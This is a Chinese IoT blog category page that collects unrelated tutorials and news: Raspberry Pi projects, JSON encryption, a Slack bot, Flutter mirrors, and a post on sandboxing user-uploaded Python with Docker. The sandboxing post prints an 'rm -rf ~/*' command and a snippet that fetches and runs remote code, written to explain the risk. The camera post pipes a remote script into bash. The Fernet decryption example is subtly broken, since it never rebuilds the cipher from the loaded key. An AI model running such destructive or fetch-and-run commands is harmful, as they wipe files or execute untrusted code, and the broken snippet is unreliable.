部署 – IoT前哨站

用树莓派Pico和镍铬丝制作电烙铁

1. 硬件准备

树莓派Pico： 作为控制核心。
镍铬丝： 作为加热元件。
MOSFET（如IRF520）： 用于控制镍铬丝的电流。
电阻（如220Ω）： 用于限制Pico GPIO引脚的电流。
电源： 提供足够的电流和电压。
导线： 耐高温导线。
烙铁头（可选）： 可以将铜丝弯曲成烙铁头形状。
隔热材料： 用于包裹镍铬丝，防止烫伤。

2. 硬件连接

将镍铬丝连接到MOSFET的漏极（Drain）。
将MOSFET的源极（Source）连接到GND。
将树莓派Pico的GPIO引脚（例如GPIO15）通过电阻连接到MOSFET的栅极（Gate）。
连接电源到镍铬丝和MOSFET。
将隔热材料包裹在镍铬丝周围。

3. MicroPython编程

Thonny IDE： 推荐使用Thonny IDE，方便编写和上传MicroPython代码。
GPIO控制： 使用MicroPython的machine库，控制GPIO引脚输出高低电平，控制MOSFET的导通和截止。

示例代码：

from machine import Pin
import time

fire_pin = Pin(15, Pin.OUT)  # 点火引脚，连接到MOSFET栅极

def fire():
    fire_pin.value(1)  # 开启加热
    print("Heating...")

def stop_fire():
    fire_pin.value(0) # 关闭加热
    print("Stop Heating.")

while True:
    input_value = input("Enter '1' to heat, '0' to stop: ")
    if input_value == '1':
        fire()
    elif input_value == '0':
        stop_fire()
    else:
        print("Invalid input.")

4. 安全注意事项

高温风险： 镍铬丝工作时会产生高温，务必小心操作，防止烫伤。
电路安全： 大电流电路存在风险，务必小心操作。
防火措施： 准备灭火器材，防止火灾发生。
测试验证： 在实际焊接前，进行充分的测试验证。
警告：
- 电烙铁具有一定的危险性，请在安全的环境下操作。
- 制作和使用电烙铁时，务必遵守相关安全规范。
- 如果对于电子电路不是十分了解，请勿自行制作。请寻找专业人员的帮助。

5. 补充说明

根据镍铬丝的电阻和电源电压，选择合适的MOSFET。
可以添加温度传感器和PID控制算法，实现温度控制功能。
关于烙铁头的制作:
- 可以找一段粗的铜丝，然后用锤子敲打铜丝的一端，敲打成扁平状，然后打磨成自己需要的烙铁头形状。
- 铜具有非常优秀的导热性，所以铜是制作烙铁头的优秀材料。

最近弄了一个室外的猫窝，理解了猫科动物对于卧室的要求。

猫的特点：敏感、警惕性高、爱干净、不喜潮湿、不喜光线直射、怕吵、怕冻、喜欢纸盒。

江浙沪特点：多雨潮湿、夏热冬冷、蛇虫鼠蚁多。

对应猫窝要点：结构简单牢固、防雨防晒、排水良好、透气性好、隐蔽性好、安全性高。

于是，我找了个餐厅用的304不锈钢大桶作为基础。灵感来自集装箱做的房子。

第一个版本的猫窝，没有特别布置，只在里面加上硬纸板。结果位置较低，下雨后里面进水，猫弹射跑路。（失败）

第二个版本，将大桶下方垫上两砖的高度，门口加矮墙。结果只能防小雨，雨一大，还是进水。猫坚持了五分钟，雨一大马上弹射跑路。（失败）

第三个版本，在桶内加垫料，增加床（大纸盒）的高度，床下留出排水通道。同时增加纵深，免得离门口太近。纸盒底部用透明塑料带加一隔水层。最后外面再挂一块布做门帘，遮阳加挡雨。（成功）

终于，大雨倾盆也不怕了。外面暴雨，它在里面踏实躺着梳理毛发。

Json文件的加解密

HTTPS可以防止传输过程中数据被偷看，但无法阻止客户端本地的攻击。比如Json之类的文件，如果完全明文，可能会让一些黑客看到敏感信息。

是否可以对其进行一层简单的加密？

以Python为例子，用一个加密库就可以。

首先执行：pip install cryptography

然后开始编写如下代码。

from cryptography.fernet import Fernet
import json

# 生成密钥
key = Fernet.generate_key()
cipher_suite = Fernet(key)

# JSON 数据
data = {
    "name": "Alice",
    "age": 30,
    "city": "Wonderland"
}

# 将 JSON 数据转换为字符串
json_data = json.dumps(data)

# 加密 JSON 数据
encrypted_data = cipher_suite.encrypt(json_data.encode())

print("加密后的数据:", encrypted_data)
print("密钥:", key)

它会输出：

加密后的数据: b’gAAAAABmraTSlRWANyVFWRKm4CgjpoJEhyLID-ri64K3RP2yItbM-4POPid1dVh_1mWVItoSzZy-bPC_pObCCDUJ-ktuxWbi5zAcSn8VDrTiYiyqwXWvygLcBHmwToapDEDoqA6RjHQs_WeOCKAZqPnge5Q-J4xNpw==’
密钥: b’MvHuTCwAj3SNz93MZtI_1Ww_tHn9XVUFxyARGyGLTxQ=’

要解密的时候怎么办呢？

from cryptography.fernet import Fernet
import json
daa = b'gAAAAABmraTSlRWANyVFWRKm4CgjpoJEhyLID-ri64K3RP2yItbM-4POPid1dVh_1mWVItoSzZy-bPC_pObCCDUJ-ktuxWbi5zAcSn8VDrTiYiyqwXWvygLcBHmwToapDEDoqA6RjHQs_WeOCKAZqPnge5Q-J4xNpw=='
key = b'MvHuTCwAj3SNz93MZtI_1Ww_tHn9XVUFxyARGyGLTxQ='
decrypted_data = cipher_suite.decrypt(daa).decode()
json_data = json.loads(decrypted_data)
print(json_data)

它会输出：
{‘name’: ‘Alice’, ‘age’: 30, ‘city’: ‘Wonderland’}

以上代码使用了 Fernet 加密算法，这是对称加密的一种实现。Fernet 是一种基于 AES（高级加密标准）的加密方案，具体来说，它使用 AES-128 在 CBC（密码分组链接）模式下进行加密，并结合 PKCS7 填充和 HMAC（基于哈希的消息认证码）来确保数据的完整性和保密性。

树莓派AI 套件上市，带NPU售价 70 美元

如果你曾经想在 Raspberry Pi 5 上尝试神经网络、人工智能和机器学习的世界，树莓派这次推出了官方AI 套件。该 AI 套件是与 Hailo 合作开发的，它可将本地高效的推理能力，集成到各种应用程序中。现已上架 Raspberry Pi 的经销商网络，价格 70 美元。

Raspberry Pi AI 套件拆解

Raspberry Pi AI 套件包括我们的 M.2 HAT+ 和 Hailo-8L AI 加速器模块。AI 套件安装在 Raspberry Pi 5 上，可让你快速构建复杂的 AI 视觉应用程序，实时运行。具有低延迟和低功耗要求。用于对象检测、语义和实例分割、姿态估计和面部识别（仅举几例）的先进神经网络完全在 Hailo-8L 协处理器上运行，使 Raspberry Pi 5 CPU 可以自由地执行其它任务。

Raspberry Pi AI 套件的主要功能包括：

每秒 13 万亿次运算 (TOPS) 的推理性能
以 8Gbps 运行的单通道 PCIe 3.0 连接
与 Raspberry Pi 图像软件子系统完全集成
与第一方或第三方相机的兼容性
加速器硬件的高效调度：在单个摄像头上运行多个神经网络，或者同时在两个摄像头上运行单个 / 多个神经网络

搭载AI Kit的树莓派5

Hailo创建了一个庞大的模型库，用户可以在这里找到各种各样的预训练神经网络模型，可以在AI Kit上部署和优化。

地址：

https://github.com/hailo-ai/hailo_model_zoo/tree/master/docs/public_models/HAILO8L

软件方面

最新版本的 Raspberry Pi OS 会自动检测 Hailo 模块，因此操作系统和利用该模块的应用程序可以立即使用它。rpicam-apps 套件现在有一个后处理模板，用于在摄像头管道中集成实时运行的神经网络推理。

“通过使用预安装的 Hailo Tappas 后处理库，仅几百行 C++ 代码就能创建基于 AI 的高级应用程序。类似级别的集成到我们的 Picamera2 框架中很快就会实现。”

除了可以在 rpicam-apps 或 Picamera2 中使用 Hailo-8L 协处理器外。Raspberry Pi AI Kit 中还打包了集成在 GStreamer 框架和本地 Python 或 C/C++ 应用程序中的 API。包括非摄像机用例，例如在预先录制的视频文件上运行推理。

近看Hailo模块

软件安装步骤非常简单。通过apt安装几个软件包，重新启动，你就可以在几分钟内尝试我们的一些AI演示。完整的说明可以在我们的入门指南中找到。下面是我们的一些演示的预览，你可以通过rpicam-apps运行。

详细步骤：

https://www.raspberrypi.com/documentation/accessories/ai-kit.html#getting-started

有了树莓派AI Kit，你不但可以在picam-apps或Picamera2中使用Hailo-8L协处理器。树莓派还打包了一个集成在GStreamer框架和本地Python或C/C++应用程序中的API。这包括非相机用例，例如在预先录制的视频文件上运行推理。

用树莓派Pico W创建自己的Slack机器人

原作：Sandeep Mistry

编译：IoT前哨站

Slack是一款在线协作软件，可以让你与团队成员进行聊天、文件传送、语音/视频通话等功能。Slack还可以整合多种工具和服务，如电子邮件、Google Drives、Twitter、Trello等，以提高工作效率和自动化任务。Slack是世界各地公司和个人的首选平台，拥有超过20万付费客户和77个财富100强企业的使用者。它有App方便大家在手机或平板电脑上使用。

这次要实现的树莓派Pico W远程控制机器人，简单来说，就是我们在手机上用Slack发消息，指挥Pico W帮我们干活。

Slack 的 chat.postMessage API 可将消息从开发板发送到 Slack 频道。Slack 为应用和机器人提供了一个事件 API，用于响应 Slack 上的活动。由于开发板不能从公共互联网直接访问，因此无法使用公共 HTTP webhook。我们必须使用Slack 的Socket Mode。Socket Mode使应用和机器人能够使用动态的WebSocket 接收事件。动态套接字连接的URL可以通过Slack的apps.connections.open API获取。

Pico W与Slack API 接收事件和发送消息的通信机制：

要完成上述操作，你必须先有Slack令牌。

配置 Slack

在 Web 浏览器中，访问 https://api.slack.com/apps 并使用您的 Slack 凭据登录。单击“创建新应用”按钮。

单击“从头开始”选项。

输入应用程序的名称（例如“Pico W”），为应用程序选择一个工作区，然后单击“创建应用程序”按钮。

单击左侧的“Socket Mode”部分，然后单击切换到“启用Socket Mode”。

输入应用级令牌的“Token Name”，例如“Pico W app”，然后单击“生成”按钮。

生成并显示应用级令牌，复制该值并保存以备将来使用，然后单击“完成”按钮。

单击左侧的“OAuth 和权限”部分，向下滚动到“Scopes”部分，然后单击“添加 OAuth 范围”按钮。

添加“app mention:read”权限。

添加“chat:write”权限。

单击左侧的“事件订阅”部分，然后单击“启用事件”开关。

展开“订阅bot事件”部分并单击“添加bot用户事件”按钮。

选择“app_mention”。

点击右下角的“保存更改”按钮。

点击左侧的“基本信息”部分，然后点击“请求安装”按钮。

填写“简短描述”，选择“背景颜色”，点击“保存更改”按钮

工作区管理员可以批准申请。然后转到“基本信息”部分，单击“安装到工作区”按钮。

安装完成后，单击左侧的“OAuth & Permissions”部分，滚动到“工作区的OAuth Token”部分，然后复制“Bot User OAuth Token”值并保存以供将来参考。

现在你有了一个应用程序级别的令牌值和一个Slack应用程序的Bot用户OAuth令牌值，可以在Raspberry Pi Pico W板上使用。

基于 MicroPython 的 Slack 机器人

MicroPython 为许多基于 Arm Cortex-M 的微控制器提供 Python 3 实现，包括 Raspberry Pi Pico W 板上的 Raspberry Pi RP2040。

Thonny IDE 将用于安装 MicroPython 并将代码上传到 Raspberry Pico W 板。从 Thonny 主页下载适用于您的计算机的操作系统（OS）专用版本的 Thonny。在撰写本指南时，Thonny 4.1.2 是最新版本。

用Thonny刷好MicroPython以后，将 GitHub 中的代码下载到计算机上的文件夹。

结论

本指南介绍了通过Raspberry Pi Pico W上运行MicroPython和C应用程序，来与Slack API发送和接收消息。

示例应用程序代码可以接收并处理消息文本，以控制板载 LED，然后将 LED 的当前状态告知用户。

你可以在自己的Raspberry Pi Pico W上尝试一下，然后在示例代码的基础上构建更多功能，从而将 Slack 扩展到物理世界。

如何安全运行别人上传的Python代码？

作者：kingname

写后端的同学，有时候需要在网站上实现一个功能，让用户上传或者编写自己的Python代码。后端再运行这些代码。

涉及到用户自己上传代码，我们第一个想到的问题，就是如何避免用户编写危险命令。如果用户的代码里面涉及到下面两行，在不做任何安全过滤的情况下，就会导致服务器的Home文件夹被清空。

import os os.system('rm -rf ~/*')

有人想的比较简单，直接判断用户的代码里面有没有os.system、exec、subprocess……这些危险关键词不就可以了吗？

这种想法乍看起来没有问题，但细想下，就会发现非常天真。如果用户的代码像下面这样写，你又要如何应对？

import requests code = requests.get('https://www.kingname.info/dangerous_code').text with open('dangerous_code.py', 'w') as f: f.write(code) dangerous_module = import('dangerous_code') danderous_module.delete_all()

其中https://www.kingname.info/dangerous_code对应的代码如下：

import os
def delete_all():
    os.system('rm -rf ~/*')

这样就可以绕过关键字检查，并成功删除你的文件了。

如果你的网站本身就是一个爬虫管理平台，你检查用户自定义的代码时，肯定不能过滤掉requests这种网络请求库。那么你就很难判断用户下载下来的东西是否包含恶意代码。

而且恶意代码不一定是删除你的东西，它完全可以直接把你项目下面的所有代码打包，上传到它指定的URL中，这样就能窃取你网站里面所有代码。

为了避免这样的情况发生，我们就必须找一个干净又独立的环境来运行用户的代码。干净的环境能确保恶意代码没有东西可以偷，独立的环境能确保他即使删除了所有文件，也不会影响到你。

显然，最简单直接的办法，就是使用Docker来运行用户的代码。而使用Docker并不一定需要在终端使用Shell命令。我们可以使用Docker的Python SDK来实现构建镜像和运行镜像。

首先，确保你的服务器上面已经有Docker，并且正在运行。

接下来，安装Docker SDK：

pip install docker

假设，你把用户上传的文件放在了user/<user_id>/upload文件夹下面。

那么，首先你需要生成一个Dockerfile，并把这个Dockerfile放到upload文件夹中：

from python:3.10

run pip install -r requirements.txt
copy . /app
workdir /app

当用户添加/修改了第三方库时，你只需要更新requirements.txt即可让镜像里面的依赖符合用户的需求。

接下来，我们开始构建镜像并运行代码：

import docker
client = docker.from_env()

client.images.build(path='user/<user_id>/upload', tag='xxxspider:0.01') # tag后面的名字可以自定义

container = client.containers.run('xxxspider:0.01', detach=True, command='scrapy crawl xxx', 其他参数)

这个代码运行以后是非阻塞的，会立刻返回container对象。当你想查看代码日志时，执行：

container.logs(tail=10) # 显示最后10行日志

就可以看到相关的日志了。

关于Docker SDK的更多操作，可以看他的官方文档：Docker SDK for Python — Docker SDK for Python 6.1.3 documentation[1]

参考资料

[1]Docker SDK for Python — Docker SDK for Python 6.1.3 documentation: https://docker-py.readthedocs.io/en/stable/index.html#docker-sdk-for-python

树莓派Zero做的电子墨水名片

“你好，我的名字是……”

人们参加沙龙或者酒会的时候，经常要对别人口述自己的名字和职业。

如果可以用电子墨水，以像素化的形式显示他们的名字和脸时，相信能节约很多时间。

创客Josh King做的这个PiE-Ink电子墨水名片，就很有意思。

在他的Instructables教程中，他解释了完整的方法。

对于徽章，Josh使用了Raspberry Pi Zero，PaPiRus 2“电子墨水HAT，Adafruit Powerboost 1000c和LiPo电池。他还用到了其它配件，例如磁铁和粘土。

Josh把树莓派Zero和Powerboost通过焊接连在一起，并允许LiPo电池为设备供电。

然后，他连接PaPiRus HAT并用粘土固定整个装置，以确保紧密贴合。他还加了一个迷你滑动开关。

在SD卡上预装Raspbian后，Josh遵循PaPiRus的设置，确保所有库文件都装好，并且让树莓派识别2英寸屏幕。

然后下载代码，运行……

注：你可以直接从Josh的GitHub帐户下载相关代码。记得将图像缩小到 200×96 才能使其适合电子墨水屏幕。

有了它，你就可以在各种活动和会议上让大家快速认识你了。

如果你想用树莓派Pico做电子墨水名片的话看这里：

https://mp.weixin.qq.com/s/Nip6ZB60et0xujLQgNRldw

树莓派能跑Stable Diffusion了

Stable Diffusion是一种文本到图像生成的大型深度学习模型，它可以根据文本的描述生成详细的图像，也可以用于其他任务，如图像修复、图像扩展、图像翻译等。

它是基于潜在扩散模型（Latent Diffusion Model）的一种变体，通过对图像添加和去除噪声来训练和生成图像。

该模型由Stability AI和LAION联合开发，目前是一个开源的AI平台，有很多用户和开发者贡献了不同的预训练模型和插件。

一般情况下，跑Stable Diffusion需要的配置：最好是有英伟达（Nvidia）的独立显卡，显存不少于4GB，推荐8GB以上；内存8GB以上，推荐16GB或以上；硬盘40GB以上的可用空间，最好是固态硬盘；操作系统支持Windows 10/11，macOS（仅限Apple Silicon或更新版本），Linux等。

但最近有人在树莓派Zero 2上运行Stable Diffusion了，而树莓派 Zero 2 只是内存512MB 的单板计算机。

它的配置和规格如下：

处理器：Broadcom BCM2710A1，四核64位SoC（Arm Cortex-A53 @ 1GHz）
内存：512MB LPDDR2
连接性：2.4GHz IEEE 802.11b/g/n无线局域网，蓝牙4.2，BLE，带天线的屏蔽罩
接口：1 × USB 2.0 OTG接口
HAT兼容的40针I/O头插座（未焊接）
microSD卡插槽
Mini HDMI端口
CSI-2摄像头连接器
视频：HDMI接口
复合的视频和复位引脚焊点
多媒体：H.264, MPEG-4解码（1080p30）
H.264编码（1080p30）
OpenGL ES 1.1, 2.0图形
输入电源：5V DC 2.5A
工作温度：-20°C to +70°C

Raspberry Pi Zero 2 W的尺寸是65mm × 30mm，与原来的Raspberry Pi Zero一样。它的性能比原来的单核Raspberry Pi Zero提高了五倍。一般用于智能家居、物联网等项目。

为了让更多低配置的计算机也能用Stable Diffusion出图。

一个名为vitoplantamura的开发者决定写一个超小的推理库，让260MB内存的单板机也能将Stable Diffusion跑起来。终于，他成功了。

他用C++开发的OnnxStream，是一个能够在低内存设备上运行 Stable Diffusion 的推理库，它通过分离推理引擎和权重提供器，以及量化等技术，完成了在树莓派 Zero 2 上生成图像的挑战。

与微软的OnnxStream 相比，vitoplantamura的OnnxStream 只需要消耗 1/55 的内存就可以达到同样的效果，但（在 CPU 上的）速度只比前者慢 0.5-2 倍。

虽然运行速度较慢，但它却是大模型在更小、更有限的设备上部署的崭新尝试。

flutter包在内地安装不了怎么办？

一般我们在flutter pub get安装包的时候，经常会遇到如下错误。

Got socket error trying to find package coverage at http://pub.dartlang.org.

或者

Got socket error trying to find package flame at https://pub.dev.

你打开浏览器访问pub.dev的时候，又可以正常访问。

这个咋解决呢？

如果你是Windows用户，你可以在Powershell的界面下运行：

setx PUB_HOSTED_URL “https://mirrors.cloud.tencent.com/dart-pub”
setx FLUTTER_STORAGE_BASE_URL “https://mirrors.cloud.tencent.com/flutter”

这两条命令。

如果你是Mac用户，你可以在命令行下运行：

$ export PUB_HOSTED_URL=https://mirrors.cloud.tencent.com/dart-pub
$ export FLUTTER_STORAGE_BASE_URL=https://mirrors.cloud.tencent.com/flutter

之前有教程说改成这样：

setx PUB_HOSTED_URL “https://pub.flutter-io.cn”
setx FLUTTER_STORAGE_BASE_URL “https://storage.flutter-io.cn”

但实际操作是无效的，现在还不知道怎么回事。

用Pi-Timolo和树莓派做一个夜视摄像头

安德鲁·格雷戈里 (Andrew Gregory) 发现，后花园的狗经常深夜叫唤。

于是他用树莓派做了一个夜间摄像头，来拍下那个不断引发狗叫的神秘访客。

要放在室外，少不了一个防雨且有一定强度的容器，这里他用到了几块厚木板。

市场上有一系列适用于 Raspberry Pi 的摄像头，比如：Pi Camera Module 3、Raspberry Pi Global Shutter Camera、Raspberry Pi High Quality Camera 和各种热敏模块。

但当访客在夜间到来，最好用的是 Pimoroni 等厂商提供的夜视摄像头。

关于树莓派的选择，作者用到了Raspberry Pi Zero W，比较轻便，兼容性也很好。

这个摄像头设在后花园，距离足够近，可以通过家庭 Wi-Fi 网络即可获取视频流。

但作者不想拉电源线，所以需要电池供电。

事后看来，最好是选择 USB 电池组——这种电池组可以即插即用到任何设备，并具有一定程度的保护作用。

作者选择了 1200mAh，3.7 V LiPo 电池，它裸露且易碎，无法直接连接到 Raspberry Pi Zero W。所以需要给 Raspberry Pi Zero 添加一个 LiPo SHIM（这需要一些焊接）。

本文提到的树莓派电池连接板，相关地址：

LiPo SHIM for Raspberry Pi

把供电模块、摄像头、树莓派都接好后的状态，差不多是这样。

装好系统，通电联网，登录系统执行如下命令进行测试：

raspistill -v -o test.jpg

如果一切顺利，你会看到一个图像在屏幕上闪了一两秒钟，然后颜色会变暗。那是因为夜视摄像头模块使用红外线（大多数摄像头模块会过滤掉这层光谱）。

作者在这里使用的软件包为 Pi-Timolo（Raspberry Pi Time、Motion 和 Low light），由 Claude Pageau 开发。

可以执行如下命令安装(最好是update系统以后)：

curl -L https://raw.github.com/pageauc/pi-timolo/master/source/pi-timolo-install.sh | bash

然后到一个设置界面，自行操作即可。

不过与 Raspberry Pi Camera Module 3 的 12MP 相比，夜视摄像头上的 5MP 传感器还是有些很小，因此作者很想找到一些红外 LED 并制作自己的摄像头模块。

来自：HackSpace 第 66 期

分类：部署